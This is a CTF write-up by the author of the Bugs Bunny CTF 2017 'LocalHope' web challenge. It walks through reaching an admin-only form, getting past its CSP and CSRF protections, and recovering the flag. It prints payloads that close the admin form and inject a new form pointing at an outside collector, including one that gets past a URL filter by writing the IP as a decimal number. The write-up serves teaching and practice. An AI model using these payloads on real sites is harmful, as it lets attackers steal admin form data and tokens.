<-- home

Bugs Bunny CTF 2017 / LocalHope

Hello ALL , its me TnMch , it was really amazing event when i was helping geek guys to make this ctf cool and enjoy hacking :D

So , when i was building some task , I get the idea of this LastHope task that need a lot of skills

So the task was first sign in/out page where you can create you account and login to the home page


Then when you login there is home and contact page with some fun picture :D



I puted this picture to give the player the chance to look more and dont focus only in this page

So if you look in source code of home page you will see hidden form :p


so here where we start look deeper :p

its msg parameter which will echo anything in the home page


but wait :D there is something i just added in header for smart guys :D


CSP default-src ‘self’ so no chance to load any script into the home page ! :D did that means no chance for XSS!!

no wait lets check more always something is missing there

using some cool staff we can get backup file /index.php.old


So here we can understand that there is hidden form for admin only

There is csrf token also , so first csp and then csrf LOOL , maybe many player will said so what we can do here its all over

But there is always hope for you guys as the picture said :D

our msg payload is just printed after the form balise :D so what we can do!!

Did you know guys we can do alot of staff here :p

Redirect submit form to our url and steal form data will not be something good :p

so if we send this url to admin :</form><form method="GET" action="https://requestb.in/xxxxxx">

The form will be changed to the new action , and here we can control over the form and get the data to our link

But as i am so bad :D i add some filtre here and i block any second url send with the link so no one can get data there XD

But smart guys and good player will not stop here and can do more

Changing our ip url to decimal can do the job for us and bypass the filtre

exp : will be 587048238

So our link can be</form><form method="GET" action="http://587048238:8080">

And all filtre bypassed :D

YUP , just we get the flag


FLAG : Bugs_Bunny{Oh_You_FFirst_Find_Me_And_Bypass_My_CSP_:((!!}


BTW it was soled by only 2 team :